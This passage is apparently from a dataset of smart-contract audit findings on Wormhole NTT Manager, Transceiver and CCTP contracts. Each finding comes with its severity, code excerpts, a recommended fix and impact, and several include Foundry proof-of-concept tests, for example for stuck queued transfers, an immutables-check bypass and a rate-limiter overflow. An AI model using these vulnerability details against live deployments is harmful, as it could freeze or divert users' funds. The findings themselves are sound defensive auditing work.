token1.decimals();\\n\\n token1.mintDummy(address(userA), 5 * 10 ** decimals);\\n uint256 outboundLimit = 4 * 10 ** decimals;\\n nttManagerChain1.setOutboundLimit(outboundLimit);\\n\\n vm.startPrank(userA);\\n\\n uint256 transferAmount = 5 * 10 ** decimals;\\n token1.approve(address(nttManagerChain1), transferAmount);\\n\\n // transfer with shouldQueue == true\\n uint64 qSeq = nttManagerChain1.transfer(\\n transferAmount, chainId2, toWormholeFormat(userB), true, encodeTransceiverInstructionsJumbled(true)\\n );\\n\\n assertEq(qSeq, 0);\\n IRateLimiter.OutboundQueuedTransfer memory qt = nttManagerChain1.getOutboundQueuedTransfer(0);\\n assertEq(qt.amount.getAmount(), transferAmount.trim(decimals, 
decimals).getAmount());\\n assertEq(qt.recipientChain, chainId2);\\n assertEq(qt.recipient, toWormholeFormat(userB));\\n assertEq(qt.txTimestamp, initialBlockTimestamp);\\n\\n // assert that the contract also locked funds from the user\\n assertEq(token1.balanceOf(address(userA)), 0);\\n assertEq(token1.balanceOf(address(nttManagerChain1)), transferAmount);\\n\\n // elapse rate limit duration - 1\\n uint256 durationElapsedTime = initialBlockTimestamp + nttManagerChain1.rateLimitDuration();\\n\\n vm.warp(durationElapsedTime);\\n\\n vm.expectRevert(0x71f23ef2); //UnorderedInstructions() selector\\n nttManagerChain1.completeOutboundQueuedTransfer(0);\\n }\\n\\n // Encode an instruction for each of the relayers\\n function encodeTransceiverInstructionsJumbled(bool relayer_off) public view returns (bytes memory) {\\n WormholeTransceiver.WormholeTransceiverInstruction memory instruction =\\n IWormholeTransceiver.WormholeTransceiverInstruction(relayer_off);\\n\\n bytes memory encodedInstructionWormhole =\\n wormholeTransceiverChain1.encodeWormholeTransceiverInstruction(instruction);\\n\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction1 =\\n TransceiverStructs.TransceiverInstruction({index: 0, payload: encodedInstructionWormhole});\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction2 =\\n TransceiverStructs.TransceiverInstruction({index: 1, payload: encodedInstructionWormhole});\\n\\n TransceiverStructs.TransceiverInstruction[] memory TransceiverInstructions =\\n new TransceiverStructs.TransceiverInstruction[](2);\\n\\n TransceiverInstructions[0] = TransceiverInstruction2;\\n TransceiverInstructions[1] = TransceiverInstruction1;\\n\\n return TransceiverStructs.encodeTransceiverInstructions(TransceiverInstructions);\\n }\\n}\\n```\\n","```\\n/* snip */\\nfor (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, 
offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n}\\n/* snip */\\n```\\n" +Queued transfers can become stuck on the source chain if new Transceivers are added or existing Transceivers are modified before completion,high,"When a sender transfers an amount that exceeds the current outbound capacity, such transfers are sent to a queue for delayed execution within `NttManager::_transferEntrypoint`. The rate limit duration is defined as an immutable variable determining the temporal lag between queueing and execution, with a typical rate limit duration being 24 hours.\\n```\\n/* snip */\\n// now check rate limits\\nbool isAmountRateLimited = _isOutboundAmountRateLimited(internalAmount);\\nif (!shouldQueue && isAmountRateLimited) {\\n revert NotEnoughCapacity(getCurrentOutboundCapacity(), amount);\\n}\\nif (shouldQueue && isAmountRateLimited) {\\n // emit an event to notify the user that the transfer is rate limited\\n emit OutboundTransferRateLimited(\\n msg.sender, sequence, amount, getCurrentOutboundCapacity()\\n );\\n\\n // queue up and return\\n _enqueueOutboundTransfer(\\n sequence,\\n trimmedAmount,\\n recipientChain,\\n recipient,\\n msg.sender,\\n transceiverInstructions\\n );\\n\\n // refund price quote back to sender\\n _refundToSender(msg.value);\\n\\n // return the sequence in the queue\\n return sequence;\\n}\\n/* snip */\\n```\\n\\nIn the event that new Transceivers are added or existing Transceivers are removed from the NTT Manager, any pending queued transfers within the rate limit duration can potentially revert. 
This is because senders might not have correctly packed the Transceiver instructions for a given Transceiver based on the new configuration, and a missing Transceiver instruction can potentially cause an array index out-of-bounds exception while calculating the delivery price when the instructions are finally parsed. For example, if there are initially two Transceivers but an additional Transceiver is added while the transfer is rate-limited, the instructions array as shown below will be declared with a length of three, corresponding to the new number of enabled Transceivers; however, the transfer will have only encoded two Transceiver instructions based on the configuration at the time it was initiated.\\n```\\nfunction parseTransceiverInstructions(\\n bytes memory encoded,\\n uint256 numEnabledTransceivers\\n) public pure returns (TransceiverInstruction[] memory) {\\n uint256 offset = 0;\\n uint256 instructionsLength;\\n (instructionsLength, offset) = encoded.asUint8Unchecked(offset);\\n\\n // We allocate an array with the length of the number of enabled transceivers\\n // This gives us the flexibility to not have to pass instructions for transceivers that\\n // don't need them\\n TransceiverInstruction[] memory instructions =\\n new TransceiverInstruction[](numEnabledTransceivers);\\n\\n uint256 lastIndex = 0;\\n for (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n }\\n\\n encoded.checkLength(offset);\\n\\n return instructions;\\n}\\n```\\n",Consider passing no instructions into the delivery price estimation when the 
Transceiver index does not exist.,"Missing Transceiver instructions prevents the total delivery price for the corresponding message from being calculated. This prevents any queued Transfers from being executed with the current list of transceivers. As a result, underlying sender funds will be stuck in the `NttManager` contract. Note that a similar issue occurs if the peer NTT manager contract is updated on the destination (say, after a redeployment on the source chain) before an in-flight attestation is received and executed, reverting with an invalid peer error.\\nProof of Concept: Run the following test:\\n```\\ncontract TestTransceiverModification is Test, INttManagerEvents, IRateLimiterEvents {\\n NttManager nttManagerChain1;\\n NttManager nttManagerChain2;\\n\\n using TrimmedAmountLib for uint256;\\n using TrimmedAmountLib for TrimmedAmount;\\n\\n uint16 constant chainId1 = 7;\\n uint16 constant chainId2 = 100;\\n uint8 constant FAST_CONSISTENCY_LEVEL = 200;\\n uint256 constant GAS_LIMIT = 500000;\\n\\n uint16 constant SENDING_CHAIN_ID = 1;\\n uint256 constant DEVNET_GUARDIAN_PK =\\n 0xcfb12303a19cde580bb4dd771639b0d26bc68353645571a8cff516ab2ee113a0;\\n WormholeSimulator guardian;\\n uint256 initialBlockTimestamp;\\n\\n WormholeTransceiver wormholeTransceiverChain1;\\n WormholeTransceiver wormholeTransceiver2Chain1;\\n WormholeTransceiver wormholeTransceiver3Chain1;\\n\\n WormholeTransceiver wormholeTransceiverChain2;\\n address userA = address(0x123);\\n address userB = address(0x456);\\n address userC = address(0x789);\\n address userD = address(0xABC);\\n\\n address relayer = address(0x28D8F1Be96f97C1387e94A53e00eCcFb4E75175a);\\n IWormhole wormhole = IWormhole(0x706abc4E45D419950511e474C7B9Ed348A4a716c);\\n\\n function setUp() public {\\n string memory url = ""https://goerli.blockpi.network/v1/rpc/public"";\\n vm.createSelectFork(url);\\n initialBlockTimestamp = vm.getBlockTimestamp();\\n\\n guardian = new WormholeSimulator(address(wormhole), 
DEVNET_GUARDIAN_PK);\\n\\n vm.chainId(chainId1);\\n DummyToken t1 = new DummyToken();\\n NttManager implementation =\\n new MockNttManagerContract(address(t1), INttManager.Mode.LOCKING, chainId1, 1 days);\\n\\n nttManagerChain1 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementation), """")));\\n nttManagerChain1.initialize();\\n\\n // transceiver 1\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiverChain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation), """"))\\n );\\n\\n // transceiver 2\\n WormholeTransceiver wormholeTransceiverChain1Implementation2 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver2Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation2), """"))\\n );\\n\\n // transceiver 3\\n WormholeTransceiver wormholeTransceiverChain1Implementation3 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver3Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation3), """"))\\n );\\n\\n\\n // Actually initialize properly now\\n wormholeTransceiverChain1.initialize();\\n wormholeTransceiver2Chain1.initialize();\\n wormholeTransceiver3Chain1.initialize();\\n\\n\\n nttManagerChain1.setTransceiver(address(wormholeTransceiverChain1));\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver2Chain1));\\n\\n // third transceiver is NOT set at this point for 
nttManagerChain1\\n nttManagerChain1.setOutboundLimit(type(uint64).max);\\n nttManagerChain1.setInboundLimit(type(uint64).max, chainId2);\\n\\n // Chain 2 setup\\n vm.chainId(chainId2);\\n DummyToken t2 = new DummyTokenMintAndBurn();\\n NttManager implementationChain2 =\\n new MockNttManagerContract(address(t2), INttManager.Mode.BURNING, chainId2, 1 days);\\n\\n nttManagerChain2 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementationChain2), """")));\\n nttManagerChain2.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain2Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain2),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n wormholeTransceiverChain2 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain2Implementation), """"))\\n );\\n wormholeTransceiverChain2.initialize();\\n\\n nttManagerChain2.setTransceiver(address(wormholeTransceiverChain2));\\n nttManagerChain2.setOutboundLimit(type(uint64).max);\\n nttManagerChain2.setInboundLimit(type(uint64).max, chainId1);\\n\\n // Register peer contracts for the nttManager and transceiver. 
Transceivers and nttManager each have the concept of peers here.\\n nttManagerChain1.setPeer(chainId2, bytes32(uint256(uint160(address(nttManagerChain2)))), 9);\\n nttManagerChain2.setPeer(chainId1, bytes32(uint256(uint160(address(nttManagerChain1)))), 7);\\n\\n // Set peers for the transceivers\\n wormholeTransceiverChain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver2Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver3Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n\\n wormholeTransceiverChain2.setWormholePeer(\\n chainId1, bytes32(uint256(uint160(address(wormholeTransceiverChain1))))\\n );\\n\\n\\n require(nttManagerChain1.getThreshold() != 0, ""Threshold is zero with active transceivers"");\\n\\n // Actually set it\\n nttManagerChain1.setThreshold(2);\\n nttManagerChain2.setThreshold(1);\\n }\\n\\n function testTransceiverModification() external {\\n vm.chainId(chainId1);\\n\\n // Setting up the transfer\\n DummyToken token1 = DummyToken(nttManagerChain1.token());\\n uint8 decimals = token1.decimals();\\n\\n token1.mintDummy(address(userA), 5 * 10 ** decimals);\\n uint256 outboundLimit = 4 * 10 ** decimals;\\n nttManagerChain1.setOutboundLimit(outboundLimit);\\n\\n vm.startPrank(userA);\\n\\n uint256 transferAmount = 5 * 10 ** decimals;\\n token1.approve(address(nttManagerChain1), transferAmount);\\n\\n // transfer with shouldQueue == true\\n uint64 qSeq = nttManagerChain1.transfer(\\n transferAmount, chainId2, toWormholeFormat(userB), true, encodeTransceiverInstructions(true)\\n );\\n vm.stopPrank();\\n\\n assertEq(qSeq, 0);\\n IRateLimiter.OutboundQueuedTransfer memory qt = nttManagerChain1.getOutboundQueuedTransfer(0);\\n assertEq(qt.amount.getAmount(), transferAmount.trim(decimals, decimals).getAmount());\\n assertEq(qt.recipientChain, 
chainId2);\\n assertEq(qt.recipient, toWormholeFormat(userB));\\n assertEq(qt.txTimestamp, initialBlockTimestamp);\\n\\n // assert that the contract also locked funds from the user\\n assertEq(token1.balanceOf(address(userA)), 0);\\n assertEq(token1.balanceOf(address(nttManagerChain1)), transferAmount);\\n\\n\\n // elapse some random time - 60 seconds\\n uint256 durationElapsedTime = initialBlockTimestamp + 60;\\n\\n // now add a third transceiver\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver3Chain1));\\n\\n // verify that the third transceiver is added\\n assertEq(nttManagerChain1.getTransceivers().length, 3);\\n\\n // remove second transceiver\\n nttManagerChain1.removeTransceiver(address(wormholeTransceiver2Chain1));\\n\\n // verify that the second transceiver is removed\\n assertEq(nttManagerChain1.getTransceivers().length, 2);\\n\\n // elapse rate limit duration\\n durationElapsedTime = initialBlockTimestamp + nttManagerChain1.rateLimitDuration();\\n\\n vm.warp(durationElapsedTime);\\n\\n vm.expectRevert(stdError.indexOOBError); //index out of bounds - transceiver instructions array does not have a third element to access\\n nttManagerChain1.completeOutboundQueuedTransfer(0);\\n }\\n\\n // Encode an instruction for each of the relayers\\n function encodeTransceiverInstructions(bool relayer_off) public view returns (bytes memory) {\\n WormholeTransceiver.WormholeTransceiverInstruction memory instruction =\\n IWormholeTransceiver.WormholeTransceiverInstruction(relayer_off);\\n\\n bytes memory encodedInstructionWormhole =\\n wormholeTransceiverChain1.encodeWormholeTransceiverInstruction(instruction);\\n\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction1 =\\n TransceiverStructs.TransceiverInstruction({index: 0, payload: encodedInstructionWormhole});\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction2 =\\n TransceiverStructs.TransceiverInstruction({index: 1, payload: 
encodedInstructionWormhole});\\n\\n TransceiverStructs.TransceiverInstruction[] memory TransceiverInstructions =\\n new TransceiverStructs.TransceiverInstruction[](2);\\n\\n TransceiverInstructions[0] = TransceiverInstruction1;\\n TransceiverInstructions[1] = TransceiverInstruction2;\\n\\n return TransceiverStructs.encodeTransceiverInstructions(TransceiverInstructions);\\n }\\n}\\n```\\n","```\\n/* snip */\\n// now check rate limits\\nbool isAmountRateLimited = _isOutboundAmountRateLimited(internalAmount);\\nif (!shouldQueue && isAmountRateLimited) {\\n revert NotEnoughCapacity(getCurrentOutboundCapacity(), amount);\\n}\\nif (shouldQueue && isAmountRateLimited) {\\n // emit an event to notify the user that the transfer is rate limited\\n emit OutboundTransferRateLimited(\\n msg.sender, sequence, amount, getCurrentOutboundCapacity()\\n );\\n\\n // queue up and return\\n _enqueueOutboundTransfer(\\n sequence,\\n trimmedAmount,\\n recipientChain,\\n recipient,\\n msg.sender,\\n transceiverInstructions\\n );\\n\\n // refund price quote back to sender\\n _refundToSender(msg.value);\\n\\n // return the sequence in the queue\\n return sequence;\\n}\\n/* snip */\\n```\\n" +Silent overflow in `TrimmedAmount::shift` could result in rate limiter being bypassed,medium,"Within `TrimmedAmount::trim`, there is an explicit check that ensures the scaled amount does not exceed the maximum uint64:\\n```\\n// NOTE: amt after trimming must fit into uint64 (that's the point of\\n// trimming, as Solana only supports uint64 for token amts)\\nif (amountScaled > type(uint64).max) {\\n revert AmountTooLarge(amt);\\n}\\n```\\n\\nHowever, no such check exists within `TrimmedAmount::shift` which means there is potential for silent overflow when casting to `uint64` here:\\n```\\nfunction shift(\\n TrimmedAmount memory amount,\\n uint8 toDecimals\\n) internal pure returns (TrimmedAmount memory) {\\n uint8 actualToDecimals = minUint8(TRIMMED_DECIMALS, toDecimals);\\n return TrimmedAmount(\\n 
uint64(scale(amount.amount, amount.decimals, actualToDecimals)), actualToDecimals\\n );\\n}\\n```\\n",Explicitly check the scaled amount in `TrimmedAmount::shift` does not exceed the maximum `uint64`.,"A silent overflow in `TrimmedAmount::shift` could result in the rate limiter being bypassed, considering its usage in `NttManager::_transferEntryPoint`. Given the high impact and reasonable likelihood of this issue occurring, it is classified a MEDIUM severity finding.","```\\n// NOTE: amt after trimming must fit into uint64 (that's the point of\\n// trimming, as Solana only supports uint64 for token amts)\\nif (amountScaled > type(uint64).max) {\\n revert AmountTooLarge(amt);\\n}\\n```\\n" +Disabled Transceivers cannot be re-enabled by calling `TransceiverRegistry::_setTransceiver` after 64 have been registered,medium,"`TransceiverRegistry::_setTransceiver` handles the registering of Transceivers, but note that they cannot be re-registered as this has other downstream effects, so this function is also responsible for the re-enabling of previously registered but currently disabled Transceivers.\\n```\\nfunction _setTransceiver(address transceiver) internal returns (uint8 index) {\\n /* snip */\\n if (transceiver == address(0)) {\\n revert InvalidTransceiverZeroAddress();\\n }\\n\\n if (_numTransceivers.registered >= MAX_TRANSCEIVERS) {\\n revert TooManyTransceivers();\\n }\\n\\n if (transceiverInfos[transceiver].registered) {\\n transceiverInfos[transceiver].enabled = true;\\n } else {\\n /* snip */\\n}\\n```\\n\\nThis function reverts if the passed transceiver address is `address(0)` or the number of registered transceivers is already at its defined maximum of 64. 
Assuming a total of 64 registered Transceivers, with some of these Transceivers having been previously disabled, the placement of this latter validation will prevent a disabled Transceiver from being re-enabled since the subsequent block in which the storage indicating its enabled state is set to `true` is not reachable. Consequently, it will not be possible to re-enable any disabled transceivers after having registered the maximum number of Transceivers, meaning that this function will never be callable without redeployment.",Move the placement of the maximum Transceivers validation to within the `else` block that is responsible for handling the registration of new Transceivers.,"Under normal circumstances, this maximum number of registered Transceivers should never be reached, especially since the underlying Transceivers are upgradeable. However, while unlikely based on operational assumptions, this undefined behavior could have a high impact, and so this is classified as a MEDIUM severity finding.",```\\nfunction _setTransceiver(address transceiver) internal returns (uint8 index) {\\n /* snip */\\n if (transceiver == address(0)) {\\n revert InvalidTransceiverZeroAddress();\\n }\\n\\n if (_numTransceivers.registered >= MAX_TRANSCEIVERS) {\\n revert TooManyTransceivers();\\n }\\n\\n if (transceiverInfos[transceiver].registered) {\\n transceiverInfos[transceiver].enabled = true;\\n } else {\\n /* snip */\\n}\\n```\\n +NTT Manager cannot be unpaused once paused,medium,"`NttManagerState::pause` exposes pause functionality to be triggered by permissioned actors but has no corresponding unpause functionality. 
As such, once the NTT Manager is paused, it will not be possible to unpause without a contract upgrade.\\n```\\nfunction pause() public onlyOwnerOrPauser {\\n _pause();\\n}\\n```\\n",```\\n// Add the line below\\n function unpause() public onlyOwnerOrPauser {\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\n,"The inability to unpause the NTT Manager could result in significant disruption, requiring either a contract upgrade or complete redeployment to resolve this issue.",```\\nfunction pause() public onlyOwnerOrPauser {\\n _pause();\\n}\\n```\\n +Transceiver invariants and ownership synchronicity can be broken by unsafe Transceiver upgrades,medium,"Transceivers are upgradeable contracts integral to the cross-chain message handling of NTT tokens. While `WormholeTransceiver` is a specific implementation of the `Transceiver` contract, NTT Managers can integrate with Transceivers of any custom implementation.\\n`Transceiver::_checkImmutables` is an internal virtual function that verifies that invariants are not violated during an upgrade. Two checks in this function are that a) the NTT Manager address remains the same and b) the underlying NTT token address remains the same.\\nHowever, the current logic allows integrators to bypass these checks by either:\\nOverriding the `_checkImmutables()` function without the above checks.\\nCalling `Implementation::_setMigratesImmutables` with a `true` input. This effectively bypasses the `_checkImmutables()` function validation during an upgrade.\\nBased on the understanding that Transceivers are deployed by integrators external to NTT Manager owners, regardless of the high trust assumptions associated with integrators, it is risky for NTT Managers to delegate power to Transceivers to silently upgrade a transceiver contract that can potentially violate the NTT Manager invariants.\\nOne example of this involves the intended ownership model. 
Within `Transceiver::_initialize`, the owner of the Transceiver is set to the owner of the `NttManager` contract:\\n```\\nfunction _initialize() internal virtual override {\\n // check if the owner is the deployer of this contract\\n if (msg.sender != deployer) {\\n revert UnexpectedDeployer(deployer, msg.sender);\\n }\\n\\n __ReentrancyGuard_init();\\n // owner of the transceiver is set to the owner of the nttManager\\n __PausedOwnable_init(msg.sender, getNttManagerOwner());\\n}\\n```\\n\\nHowever, the transferring of this ownership via `Transceiver::transferTransceiverOwnership` is only allowed by the NTT Manager itself:\\n```\\n/// @dev transfer the ownership of the transceiver to a new address\\n/// the nttManager should be able to update transceiver ownership.\\nfunction transferTransceiverOwnership(address newOwner) external onlyNttManager {\\n _transferOwnership(newOwner);\\n}\\n```\\n\\nWhen the owner of the NTT Manager is changed by calling `NttManagerState::transferOwnership`, the owner of all the Transceivers is changed with it:\\n```\\n/// @notice Transfer ownership of the Manager contract and all Endpoint contracts to a new owner.\\nfunction transferOwnership(address newOwner) public override onlyOwner {\\n super.transferOwnership(newOwner);\\n // loop through all the registered transceivers and set the new owner of each transceiver to the newOwner\\n address[] storage _registeredTransceivers = _getRegisteredTransceiversStorage();\\n _checkRegisteredTransceiversInvariants();\\n\\n for (uint256 i = 0; i < _registeredTransceivers.length; i++) {\\n ITransceiver(_registeredTransceivers[i]).transferTransceiverOwnership(newOwner);\\n }\\n}\\n```\\n\\nThis design is intended to ensure that the NTT Manager's owner is kept in sync across all transceivers, access-controlled to prevent unauthorized ownership changes, but transceiver ownership can still be transferred directly as the public `OwnableUpgradeable::transferOwnership` function has not been overridden. 
Even if Transceiver ownership changes, the Manager is permitted to change it again via the above function.\\nHowever, this behavior can be broken if the new owner of a Transceiver performs a contract upgrade without the immutables check. In this way, they can change the NTT Manager, preventing the correct manager from having permissions as expected. As a result, `NttManagerState::transferOwnership` will revert if any one Transceiver is out of sync with the others, and since it is not possible to remove an already registered transceiver, this function will cease to be useful. Instead, each Transceiver will be forced to be manually updated to the new owner unless the modified Transceiver is reset back to the previous owner so that this function can be called again.","Consider making `Transceiver::_checkImmutables` and `Implementation::_setMigratesImmutables` private functions for Transceivers. If the `_checkImmutables()` function has to be overridden, consider exposing another function that is called inside `_checkImmutables` as follows:\\n```\\nfunction _checkImmutables() private view override {\\n assert(this.nttManager() == nttManager);\\n assert(this.nttManagerToken() == nttManagerToken);\\n _checkAdditionalImmutables();\\n}\\n\\nfunction _checkAdditionalImmutables() private view virtual override {}\\n```\\n","While this issue may require the owner of a Transceiver to misbehave, a scenario where a Transceiver is silently upgraded with a new NTT Manager or NTT Manager token can be problematic for cross-chain transfers and so is pertinent to note.\\nProof of Concept: The below PoC calls the `_setMigratesImmutables()` function with the `true` boolean, effectively bypassing the `_checkImmutables()` invariant check. As a result, a subsequent call to `NttManagerState::transferOwnership` is demonstrated to revert. 
This test should be added to the contract in `Upgrades.t.sol` before running, and the revert in `MockWormholeTransceiverContract::transferOwnership` should be removed to reflect the `true` functionality.\\n```\\nfunction test_immutableUpgradePoC() public {\\n // create the new mock ntt manager contract\\n NttManager newImpl = new MockNttManagerContract(\\n nttManagerChain1.token(), IManagerBase.Mode.BURNING, chainId1, 1 days, false\\n );\\n MockNttManagerContract newNttManager =\\n MockNttManagerContract(address(new ERC1967Proxy(address(newImpl), """")));\\n newNttManager.initialize();\\n\\n // transfer transceiver ownership\\n wormholeTransceiverChain1.transferOwnership(makeAddr(""new transceiver owner""));\\n\\n // create the new transceiver implementation, specifying the new ntt manager\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverImmutableAllow(\\n address(newNttManager),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n // perform the transceiver upgrade\\n wormholeTransceiverChain1.upgrade(address(wormholeTransceiverChain1Implementation));\\n\\n // ntt manager ownership transfer should fail and revert\\n vm.expectRevert(abi.encodeWithSelector(ITransceiver.CallerNotNttManager.selector, address(this)));\\n nttManagerChain1.transferOwnership(makeAddr(""new ntt manager owner""));\\n}\\n```\\n","```\\nfunction _initialize() internal virtual override {\\n // check if the owner is the deployer of this contract\\n if (msg.sender != deployer) {\\n revert UnexpectedDeployer(deployer, msg.sender);\\n }\\n\\n __ReentrancyGuard_init();\\n // owner of the transceiver is set to the owner of the nttManager\\n __PausedOwnable_init(msg.sender, getNttManagerOwner());\\n}\\n```\\n" +Asymmetry in Transceiver pausing capability,low,"Pausing functionality is exposed via Transceiver::_pauseTransceiver; however, there is no corresponding function that exposes unpausing 
functionality:\\n```\\n/// @dev pause the transceiver.\\nfunction _pauseTransceiver() internal {\\n _pause();\\n}\\n```\\n",```\\n// Add the line below\\n /// @dev unpause the transceiver.\\n// Add the line below\\n function _unpauseTransceiver() internal {\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\n,"While not an immediate issue since the above function is not currently in use anywhere, this should be resolved to avoid cases where Transceivers could become permanently paused.",```\\n/// @dev pause the transceiver.\\nfunction _pauseTransceiver() internal {\\n _pause();\\n}\\n```\\n +Incorrect Transceiver payload prefix definition,low,"The `WH_TRANSCEIVER_PAYLOAD_PREFIX` constant in `WormholeTransceiverState.sol` contains invalid ASCII bytes and, as such, does not match what is written in the inline developer documentation:\\n```\\n/// @dev Prefix for all TransceiverMessage payloads\\n/// This is 0x99'E''W''H'\\n/// @notice Magic string (constant value set by messaging provider) that idenfies the payload as an transceiver-emitted payload.\\n/// Note that this is not a security critical field. 
It's meant to be used by messaging providers to identify which messages are Transceiver-related.\\nbytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x9945FF10;\\n```\\n\\nThe correct payload prefix is `0x99455748`, which is output when running the following command:\\n```\\ncast --from-utf8 ""EWH""\\n```\\n",Update the constant definition to use the correct prefix corresponding to the documented string:\\n```\\n// Add the line below\\n bytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x99455748;\\n```\\n,"While still a valid 4-byte hex prefix, used purely for identification purposes, an incorrect prefix could cause downstream confusion and result in otherwise valid Transceiver payloads being incorrectly prefixed.",```\\n/// @dev Prefix for all TransceiverMessage payloads\\n/// This is 0x99'E''W''H'\\n/// @notice Magic string (constant value set by messaging provider) that idenfies the payload as an transceiver-emitted payload.\\n/// Note that this is not a security critical field. It's meant to be used by messaging providers to identify which messages are Transceiver-related.\\nbytes4 constant WH_TRANSCEIVER_PAYLOAD_PREFIX = 0x9945FF10;\\n```\\n +Redemptions are blocked when L2 sequencers are down,medium,"Given that rollups such as Optimism and Arbitrum offer methods for forced transaction inclusion, it is important that the aliased sender address is also checked within `Logic::redeemTokensWithPayload` when verifying the sender is the specified `mintRecipient` to allow for maximum uptime in the event of sequencer downtime.\\n```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, ""caller must be mintRecipient""\\n);\\n```\\n",Validation of the sender address against the `mintRecipient` should also consider the aliased `mintRecipient` address to allow for maximum uptime when `Logic::redeemTokensWithPayload` is called via forced inclusion.,"Failure to consider the 
aliased `mintRecipient` address prevents the execution of valid VAAs on a target CCTP domain where transactions are batched by a centralized L2 sequencer. Since this VAA could carry a time-sensitive payload, such as the urgent cross-chain liquidity infusion to a protocol, this issue has the potential to have a high impact with reasonable likelihood.\\nProof of Concept:\\nProtocol X attempts to transfer 10,000 USDC from CCTP Domain A to CCTP Domain B.\\nCCTP Domain B is an L2 rollup that batches transactions for publishing onto the L1 chain via a centralized sequencer.\\nThe L2 sequencer goes down; however, transactions can still be executed via forced inclusion on the L1 chain.\\nProtocol X implements the relevant functionality and attempts to redeem 10,000 USDC via forced inclusion.\\nThe Wormhole CCTP integration does not consider the contract's aliased address when validating the `mintRecipient`, so the redemption fails.\\nCross-chain transfer of this liquidity will remain blocked so long as the sequencer is down.","```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, ""caller must be mintRecipient""\\n);\\n```\\n" +Potentially dangerous out-of-bounds memory access in `BytesParsing::sliceUnchecked`,low,"`BytesParsing::sliceUnchecked` currently bails early for the degenerate case when the slice `length` is zero; however, there is no validation on the `length` of the `encoded` bytes parameter `encoded` itself. 
If the `length` of `encoded` is less than the slice `length`, then it is possible to access memory out-of-bounds.\\n```\\nfunction sliceUnchecked(bytes memory encoded, uint256 offset, uint256 length)\\n internal\\n pure\\n returns (bytes memory ret, uint256 nextOffset)\\n{\\n //bail early for degenerate case\\n if (length == 0) {\\n return (new bytes(0), offset);\\n }\\n\\n assembly (""memory-safe"") {\\n nextOffset := add(offset, length)\\n ret := mload(freeMemoryPtr)\\n\\n /* snip: inline dev comments */\\n\\n let shift := and(length, 31) //equivalent to `mod(length, 32)` but 2 gas cheaper\\n if iszero(shift) { shift := wordSize }\\n\\n let dest := add(ret, shift)\\n let end := add(dest, length)\\n for { let src := add(add(encoded, shift), offset) } lt(dest, end) {\\n src := add(src, wordSize)\\n dest := add(dest, wordSize)\\n } { mstore(dest, mload(src)) }\\n\\n mstore(ret, length)\\n //When compiling with --via-ir then normally allocated memory (i.e. via new) will have 32 byte\\n // memory alignment and so we enforce the same memory alignment here.\\n mstore(freeMemoryPtr, and(add(dest, 31), not(31)))\\n }\\n}\\n```\\n\\nSince the `for` loop begins at the offset of `encoded` in memory, accounting `for` its `length` and accompanying `shift` calculation depending on the `length` supplied, and execution continues so long as `dest` is less than `end`, it is possible to continue loading additional words out of bounds simply by passing larger `length` values. 
